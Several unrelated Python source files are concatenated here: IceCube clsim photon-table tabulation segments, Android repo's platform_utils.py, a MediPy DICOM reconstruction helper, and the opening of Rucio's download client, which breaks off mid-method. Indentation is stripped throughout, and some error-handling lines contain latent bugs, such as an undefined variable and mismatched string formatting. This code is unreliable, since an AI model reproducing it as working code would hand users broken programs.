if MCTreeName is None or MCTreeName=="":
clSimMCTreeName=""
if ChopMuons:
raise RuntimeError("You cannot have \"MMCTrackListName\" enabled with no MCTree!")
else:
clSimMCTreeName=MCTreeName
if FlasherInfoVectName is None or FlasherInfoVectName=="":
if (FlasherPulseSeriesName is not None) and (FlasherPulseSeriesName!=""):
SimulateFlashers=True
clSimFlasherPulseSeriesName = FlasherPulseSeriesName
clSimOMKeyMaskName = ""
else:
SimulateFlashers=False
clSimFlasherPulseSeriesName = ""
clSimOMKeyMaskName = ""
else:
if (FlasherPulseSeriesName is not None) and (FlasherPulseSeriesName!=""):
raise RuntimeError("You cannot use the FlasherPulseSeriesName and FlasherInfoVectName parameters at the same time!")
SimulateFlashers=True
clSimFlasherPulseSeriesName = FlasherInfoVectName + "_pulses"
clSimOMKeyMaskName = FlasherInfoVectName + "_OMKeys"
tray.AddModule(clsim.FlasherInfoVectToFlasherPulseSeriesConverter,
name + "_FlasherInfoVectToFlasherPulseSeriesConverter",
FlasherInfoVectName = FlasherInfoVectName,
FlasherPulseSeriesName = clSimFlasherPulseSeriesName,
FlasherOMKeyVectName = clSimOMKeyMaskName,
If=If)
# (optional) pre-processing
if ChopMuons:
if OutputMCTreeName is not None:
clSimMCTreeName_new = OutputMCTreeName
else:
clSimMCTreeName_new = clSimMCTreeName + "_sliced"
tray.AddModule("I3MuonSlicer", name + "_chopMuons",
InputMCTreeName=clSimMCTreeName,
MMCTrackListName=MMCTrackListName,
OutputMCTreeName=clSimMCTreeName_new,
If=If)
clSimMCTreeName = clSimMCTreeName_new
else:
if (OutputMCTreeName is not None) and (OutputMCTreeName != ""):
# copy the MCTree to the requested output name
def copyMCTree(frame, inputName, outputName, If_=None):
if If_ is not None:
if not If_(frame): return
frame[outputName] = frame[inputName]
tray.AddModule(copyMCTree, name + "_copyMCTree",
inputName=clSimMCTreeName,
outputName=OutputMCTreeName,
Streams=[icetray.I3Frame.DAQ],
If_=If)
clSimMCTreeName = OutputMCTreeName
else:
clSimMCTreeName = clSimMCTreeName
# some constants
DOMRadius = 0.16510*icetray.I3Units.m # 13" diameter
if Area is None:
referenceArea = dataclasses.I3Constants.pi*DOMRadius**2
else:
referenceArea = Area
if WavelengthAcceptance is None:
domAcceptance = clsim.GetIceCubeDOMAcceptance(domRadius=DOMRadius)
else:
domAcceptance = WavelengthAcceptance
if AngularAcceptance is None:
angularAcceptance = clsim.GetIceCubeDOMAngularSensitivity(holeIce=expandvars("$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm"))
else:
angularAcceptance = AngularAcceptance
# muon&cascade parameterizations
ppcConverter = clsim.I3CLSimLightSourceToStepConverterPPC(photonsPerStep=200)
ppcConverter.SetUseCascadeExtension(UseCascadeExtension)
if not UseGeant4:
particleParameterizations = GetDefaultParameterizationList(ppcConverter, muonOnly=False)
else:
if CrossoverEnergyEM>0 or CrossoverEnergyHadron>0:
particleParameterizations = GetHybridParameterizationList(ppcConverter, CrossoverEnergyEM=CrossoverEnergyEM, CrossoverEnergyHadron=CrossoverEnergyHadron)
elif MMCTrackListName is None or MMCTrackListName=="":
particleParameterizations = [] # make sure absolutely **no** parameterizations are used
else:
# use no parameterizations except for muons with lengths assigned to them
# (those are assumed to have been generated by MMC)
particleParameterizations = GetDefaultParameterizationList(ppcConverter, muonOnly=True)
# flasher parameterizations
if SimulateFlashers:
# this needs a spectrum table in order to pass spectra to OpenCL
spectrumTable = clsim.I3CLSimSpectrumTable()
particleParameterizations += GetFlasherParameterizationList(spectrumTable)
icetray.logging.log_debug("number of spectra (1x Cherenkov + Nx flasher): %d" % len(spectrumTable), unit="clsim")
else:
# no spectrum table is necessary when only using the Cherenkov spectrum
spectrumTable = None
openCLDevices = configureOpenCLDevices(
UseGPUs=UseGPUs,
UseCPUs=UseCPUs,
OverrideApproximateNumberOfWorkItems=OverrideApproximateNumberOfWorkItems,
DoNotParallelize=DoNotParallelize,
UseOnlyDeviceNumber=UseOnlyDeviceNumber
)
tray.AddModule("I3CLSimTabulatorModule", name + "_clsim",
MCTreeName=clSimMCTreeName,
RandomService=RandomService,
MediumProperties=MediumProperties,
SpectrumTable=spectrumTable,
FlasherPulseSeriesName=clSimFlasherPulseSeriesName,
Area=referenceArea,
WavelengthAcceptance=domAcceptance,
AngularAcceptance=angularAcceptance,
ParameterizationList=particleParameterizations,
# MaxNumParallelEvents=ParallelEvents,
OpenCLDeviceList=openCLDevices,
**ExtraArgumentsToI3CLSimModule
)
unpin_threads()
@traysegment
def TabulatePhotonsFromSource(tray, name, PhotonSource="cascade", Zenith=0.*I3Units.degree, Azimuth=0.*I3Units.degree, ZCoordinate=0.*I3Units.m,
Energy=1.*I3Units.GeV, FlasherWidth=127, FlasherBrightness=127, Seed=12345, NEvents=100,
IceModel='spice_mie', DisableTilt=False, Filename="", TabulateImpactAngle=False,
PhotonPrescale=1, Axes=None, Directions=None, Sensor='DOM', RecordErrors=False):
"""
Tabulate the distribution of photoelectron yields on IceCube DOMs from various
light sources. The light profiles of the sources are computed from the same
    parameterizations used in PPC but, as in the direct propagation mode, they
    can be computed using Geant4 instead.
The mode of tabulation is controlled primarily by the **PhotonSource** parameter.
- *'cascade'* will simulate an electromagnetic cascade of **Energy** GeV at
(0, 0, **ZCoordinate**), oriented according to **Zenith** and **Azimuth**.
      The default coordinate system is spherical and centered on the given vertex,
with 200 quadratically spaced bins in radius, 36 linear bins in azimuthal
angle (only from 0 to 180 degrees by default), 100 linear bins in the
      cosine of the polar angle, and 105 quadratic bins in time residual w.r.t.
the direct path from (0, 0, **ZCoordinate**).
- *'flasher'* will simulate a 405 nm LED flasher pulse with the given
**FlasherWidth** and **FlasherBrightness** settings. The source position
and coordinate system are the same as for the 'cascade' case.
- *'infinite-muon'* will simulate a "bare" muon of infinite length. The
coordinate system is cylindrical and centered on the axis of the muon.
Since the muon's position is degenerate with time, the usual parallel
distance is replaced by the z coordinate of the closest approach to the
detection position, and the starting positions of the simulated muons are
sampled randomly (**ZCoordinate** is ignored). There are 100 quadratic
bins in perpendicular distance to the source axis, 36 linear bins in
azimuthal angle (0 to :math:`\pi` radians), 100 linear bins in z
coordinate of closest approach, and 105 quadratic bins in time residual
w.r.t. the earliest possible Cherenkov photon.
:param PhotonSource: the type of photon source ('cascade', 'flasher', or 'infinite-muon').
:param Zenith: the orientation of the source
:param ZCoordinate: the depth of the source
:param Energy: the energy of the source (only for cascade tables)
:param FlasherWidth: the width of the flasher pulse (only for flasher tables)
:param FlasherBrightness: the brightness of the flasher pulse (only for flasher tables)
:param Seed: the seed for the random number service
:param NEvents: the number of events to simulate
:param RecordErrors: record the squares of weights as well (useful for error bars)
:param IceModel: the path to an ice model in $I3_BUILD/ice-models/resources/models. Likely values include:
'spice_mie' ppc-style SPICE-Mie parametrization
:param DisableTilt: if true, disable tilt in ice model
:param Filename: the name of the FITS file to write
:param TabulateImpactAngle: if True, tabulate the impact position of the
photon on the DOM instead of weighting by the DOM's angular acceptance
:param Axes: a subclass of :cpp:class:`clsim::tabulator::Axes` that defines the coordinate system.
If None, an appropriate default will be chosen based on **PhotonSource**.
:param Directions: a set of directions to allow table generation for multiple sources.
If None, only one direction given by **Zenith** and **Azimuth** is used.
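
    Example (illustrative values; a tray is assumed to already exist)::

        tray.AddSegment(TabulatePhotonsFromSource, "tabulate",
            PhotonSource="cascade",
            Zenith=45.*I3Units.degree,
            ZCoordinate=-200.*I3Units.m,
            Energy=1.*I3Units.GeV,
            NEvents=1000,
            Filename="cascade_table.fits")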
"""
# check sanity of args
PhotonSource = PhotonSource.lower()
if PhotonSource not in ['cascade', 'flasher', 'infinite-muon']:
raise ValueError("photon source %s is unknown. Please specify either 'cascade', 'flasher', or 'infinite-muon'" % PhotonSource)
from icecube import icetray, dataclasses, dataio, phys_services, sim_services, clsim
from os.path import expandvars
# a random number generator
randomService = phys_services.I3GSLRandomService(Seed)
tray.AddModule("I3InfiniteSource",name+"streams",
Stream=icetray.I3Frame.DAQ)
tray.AddModule("I3MCEventHeaderGenerator",name+"gen_header",
Year=2009,
DAQTime=158100000000000000,
RunNumber=1,
EventID=1,
IncrementEventID=True)
if Directions is None:
Directions = numpy.asarray([(Zenith, Azimuth)])
if PhotonSource in ('cascade', 'flasher', 'muon-segment'):
if PhotonSource == 'muon-segment':
ptype = I3Particle.ParticleType.MuMinus
else:
ptype = I3Particle.ParticleType.EMinus
def reference_source(zenith, azimuth, scale):
source = I3Particle()
source.type = ptype
source.energy = Energy*scale
source.pos = I3Position(0., 0., ZCoordinate)
source.dir = I3Direction(zenith, azimuth)
source.time = 0.
if PhotonSource == 'muon-segment':
source.length = 3.
else:
source.length = 0.
source.location_type = I3Particle.LocationType.InIce
return source
elif PhotonSource == 'infinite-muon':
from icecube import MuonGun
# pad depth to ensure that the track appears effectively infinite
surface = MuonGun.Cylinder(1800, 800)
# account for zenith-dependent distribution of track lengths
length_scale = surface.area(dataclasses.I3Direction(0, 0))/surface.area(dataclasses.I3Direction(Zenith, 0))
ptype = I3Particle.ParticleType.MuMinus
def reference_source(zenith, azimuth, scale):
source = I3Particle()
source.type = ptype
source.energy = Energy*scale
source.dir = I3Direction(zenith, azimuth)
source.pos = surface.sample_impact_position(source.dir, randomService)
crossings = surface.intersection(source.pos, source.dir)
source.length = crossings.second-crossings.first
source.time = 0.
source.location_type = I3Particle.LocationType.InIce
return source
import copy
class MakeParticle(icetray.I3Module):
def __init__(self, ctx):
super(MakeParticle,self).__init__(ctx)
self.AddOutBox("OutBox")
self.AddParameter("SourceFunction", "", lambda : None)
self.AddParameter("NEvents", "", 100)
def Configure(self):
self.reference_source = self.GetParameter("SourceFunction")
self.nevents = self.GetParameter("NEvents")
self.emittedEvents = 0
def DAQ(self, frame):
if PhotonSource != "flasher":
primary = I3Particle()
mctree = I3MCTree()
mctree.add_primary(primary)
for zenith, azimuth in Directions:
source = self.reference_source(zenith, azimuth, 1./len(Directions))
mctree.append_child(primary, source)
frame["I3MCTree"] = mctree
# use the emitting particle as a geometrical reference
frame["ReferenceParticle"] = source
else:
pulseseries = I3CLSimFlasherPulseSeries()
for zenith, azimuth in Directions:
pulse = makeFlasherPulse(0, 0, ZCoordinate, zenith, azimuth, FlasherWidth, FlasherBrightness, 1./len(Directions))
pulseseries.append(pulse)
frame["I3FlasherPulseSeriesMap"] = pulseseries
frame["ReferenceParticle"] = self.reference_source(Zenith, Azimuth, 1.)
self.PushFrame(frame)
self.emittedEvents += 1
if self.emittedEvents >= self.nevents:
self.RequestSuspension()
tray.AddModule(MakeParticle, SourceFunction=reference_source, NEvents=NEvents)
if PhotonSource == "flasher":
flasherpulse = "I3FlasherPulseSeriesMap"
mctree = None
else:
flasherpulse = None
mctree = "I3MCTree"
header = dict(FITSTable.empty_header)
header['zenith'] = Zenith/I3Units.degree
header['azimuth'] = Azimuth/I3Units.degree
header['z'] = ZCoordinate
header['energy'] = Energy
header['type'] = int(ptype)
header['efficiency'] = Efficiency.RECEIVER | Efficiency.WAVELENGTH
if PhotonSource == 'infinite-muon':
header['n_events'] = length_scale*NEvents/float(PhotonPrescale)
if Axes is None:
if PhotonSource != "infinite-muon":
dims = [
clsim.tabulator.PowerAxis(0, 580, 200, 2),
clsim.tabulator.LinearAxis(0, 180, 36),
clsim.tabulator.LinearAxis(-1, 1, 100),
clsim.tabulator.PowerAxis(0, 7e3, 105, 2),
]
geo = clsim.tabulator.SphericalAxes
else:
dims = [
clsim.tabulator.PowerAxis(0, 580, 100, 2),
clsim.tabulator.LinearAxis(0, numpy.pi, 36),
clsim.tabulator.LinearAxis(-8e2, 8e2, 80),
clsim.tabulator.PowerAxis(0, 7e3, 105, 2),
]
geo = clsim.tabulator.CylindricalAxes
# Add a dimension for the impact angle
if TabulateImpactAngle:
dims.append(clsim.tabulator.LinearAxis(-1, 1, 20))
Axes = geo(dims)
if PhotonSource == "flasher":
header['flasherwidth'] = FlasherWidth
header['flasherbrightness'] = FlasherBrightness
# some constants
DOMRadius = 0.16510*icetray.I3Units.m # 13" diameter
referenceArea = dataclasses.I3Constants.pi*DOMRadius**2
    # NB: GetIceCubeDOMAcceptance() calculates the quantum efficiency by
    # dividing the geometric area (a circle of radius domRadius) by the
    # tabulated effective area. Scaling that radius by *sqrt(prescale)*
    # _reduces_ the effective quantum efficiency by a factor *prescale*.
    # Since we draw photons directly from the QE-weighted Cherenkov
    # spectrum, this causes *prescale* fewer photons to be propagated per
    # light source. We compensate by dividing the number of events by
    # *prescale* in the header above.
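    # Worked example (illustrative): with PhotonPrescale=4 the sampling radius
    # becomes 2*DOMRadius, the geometric area grows by a factor of 4, the
    # effective quantum efficiency drops by a factor of 4, and n_events in the
    # header is divided by 4 to compensate.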
domAcceptance = clsim.GetIceCubeDOMAcceptance(domRadius=math.sqrt(PhotonPrescale)*DOMRadius)
if Sensor.lower() == 'dom':
angularAcceptance = clsim.GetIceCubeDOMAngularSensitivity(holeIce=expandvars("$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm"))
elif Sensor.lower() == 'degg':
referenceArea = dataclasses.I3Constants.pi*(300.*I3Units.mm/2)**2
angularAcceptance = Gen2Sensors.GetDEggAngularSensitivity(pmt='both')
domAcceptance = Gen2Sensors.GetDEggAcceptance(active_fraction=1./PhotonPrescale)
elif Sensor.lower() == 'wom':
# outer diameter of the pressure vessel is 11.4 cm, walls are 9 mm thick
referenceArea = (11-2*0.9)*90*icetray.I3Units.cm2
angularAcceptance = Gen2Sensors.GetWOMAngularSensitivity()
domAcceptance = Gen2Sensors.GetWOMAcceptance(active_fraction=1./PhotonPrescale)
else:
raise ValueError("Don't know how to simulate %ds yet" % (sensor))
tray.AddSegment(I3CLSimTabulatePhotons, name+"makeCLSimPhotons",
MCTreeName = mctree, # if source is a cascade this will point to the I3MCTree
FlasherPulseSeriesName = flasherpulse, # if source is a flasher this will point to the I3CLSimFlasherPulseSeries
MMCTrackListName = None, # do NOT use MMC
ParallelEvents = 1, # only work at one event at a time (it'll take long enough)
RandomService = randomService,
# UnWeightedPhotons=True,
UseGPUs=False, # table-making is not a workload particularly suited to GPUs
UseCPUs=True, # it should work fine on CPUs, though
Area=referenceArea,
WavelengthAcceptance=domAcceptance,
AngularAcceptance=angularAcceptance,
DoNotParallelize=True, # no multithreading
UseGeant4=False,
OverrideApproximateNumberOfWorkItems=1, # if you *would* use multi-threading, this would be the maximum number of jobs to run in parallel (OpenCL is free to split them)
ExtraArgumentsToI3CLSimModule=dict(Filename=Filename, TableHeader=header,
Axes=Axes, PhotonsPerBunch=200, EntriesPerPhoton=5000, RecordErrors=RecordErrors),
MediumProperties=parseIceModel(expandvars("$I3_BUILD/ice-models/resources/models/" + IceModel), disableTilt=DisableTilt),
)
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
  fcntl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(self, fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
    # The queue is shared across all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
    # Return only one stream at a time, as it is the most straightforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
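# Illustrative usage sketch (hypothetical helper, not part of the original
# module): shows how the FileDescriptorStreams abstraction above is typically
# driven to drain the output of a subprocess.
def _example_drain_subprocess(cmd):
  """ Drain stdout/stderr of a subprocess using FileDescriptorStreams.
  The command handling shown here is an assumption for demonstration only.
  """
  import subprocess
  import sys
  p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  streams = FileDescriptorStreams.create()
  streams.add(p.stdout, sys.stdout, 'stdout')
  streams.add(p.stderr, sys.stderr, 'stderr')
  while not streams.is_done:
    for stream in streams.select():
      data = stream.read()
      if not data:
        # EOF: non-blocking streams return '', threaded streams return None.
        stream.close()
        streams.remove(stream)
      # A real caller would forward 'data' to stream.dest here.
  return p.wait()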
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
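# Example (illustrative): on Windows an absolute path longer than the limit,
# e.g. r'C:\work\<...many nested directories...>\file.txt', is returned with
# the long-path prefix ('\\\\?\\' plus the normalized path), while short paths,
# relative paths and paths that already carry the prefix are returned as-is.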
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
reconstruction.py
|
##########################################################################
# MediPy - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
import numpy
import wx
from medipy.gui import PeriodicProgressDialog, WorkerThread
from explorer_dialog import ExplorerDialog
from stacks_dialog import StacksDialog
import medipy.io.dicom
def images(datasets, parent, dtype=numpy.single,
size=(700,700), style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER) :
""" Return a list of medipy.base.Image objects from a list of DataSets.
"""
dialog = ExplorerDialog(parent, size=size,style=style)
dialog.set_datasets(datasets)
    # Size must be specified explicitly on Windows
dialog.SetSize((700,700))
if dialog.ShowModal() != wx.ID_OK :
dialog.Destroy()
return []
dialog.Destroy()
# Get selected series from dialog, load it.
series = dialog.get_selected_datasets()
periodic_progress_dialog = PeriodicProgressDialog(
0.2, "Loading files", "Loading files ...")
worker_thread = WorkerThread(
periodic_progress_dialog,
target=medipy.io.dicom.load_dicomdir_records, args=(series,))
worker_thread.start()
periodic_progress_dialog.start()
worker_thread.join()
periodic_progress_dialog.Destroy()
if worker_thread.exception is not None :
wx.MessageBox(
"Could not load series : %s"%(worker_thread.exception,),
"Could not load series")
return []
series = worker_thread.result
# Reconstruct one image per stack
series = medipy.io.dicom.split.images(series)
series = medipy.io.dicom.normalize.normalize(series)
stacks = medipy.io.dicom.stacks(series)
result = []
periodic_progress_dialog = PeriodicProgressDialog(
0.2, "Reconstructing images",
"Reconstructing images (%i/%i) ..."%(0, len(stacks)))
for index, stack in enumerate(stacks) :
periodic_progress_dialog.Pulse(
"Reconstructing images (%i/%i) ..."%(index+1, len(stacks)))
worker_thread = WorkerThread(periodic_progress_dialog,
target=medipy.io.dicom.image, args=(stack,))
worker_thread.start()
periodic_progress_dialog.start()
worker_thread.join()
if worker_thread.exception is not None :
wx.MessageBox(
"Could not reconstruct image : %s"%(worker_thread.exception,),
"Could not reconstruct image")
else :
image = worker_thread.result
if dtype is not None :
image.data = image.data.astype(dtype)
result.append(image)
periodic_progress_dialog.Destroy()
return result
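# Illustrative usage sketch (hypothetical caller; requires a running wx.App
# and a list of medipy.io.dicom datasets, e.g. read from a DICOMDIR):
#
#   loaded_images = images(datasets, parent=my_frame)
#   for image in loaded_images:
#       print(image.data.shape)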
|
downloadclient.py
|
# -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import copy
import itertools
import logging
import os
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.config import config_get
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException)
from rucio.common.didtype import DID
from rucio.common.pcache import Pcache
from rucio.common.utils import adler32, detect_client_location, generate_uuid, parse_replicas_from_string, \
send_trace, sizefmt, execute, parse_replicas_from_file, extract_scope
from rucio.common.utils import GLOBALLY_SUPPORTED_CHECKSUMS, CHECKSUM_ALGO_DICT, PREFERRED_CHECKSUM
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger=logging.log):
"""
        Initialises an extraction tool object
:param program_name: the name of the archive extraction program, e.g., unzip
        :param useability_check_args: the arguments of the extraction program used to test whether it is installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: optional decorated logging.log object that can be passed from the calling daemon or client.
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
        self.is_usable_result = None
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
        if self.is_usable_result is not None:
            return self.is_usable_result
self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
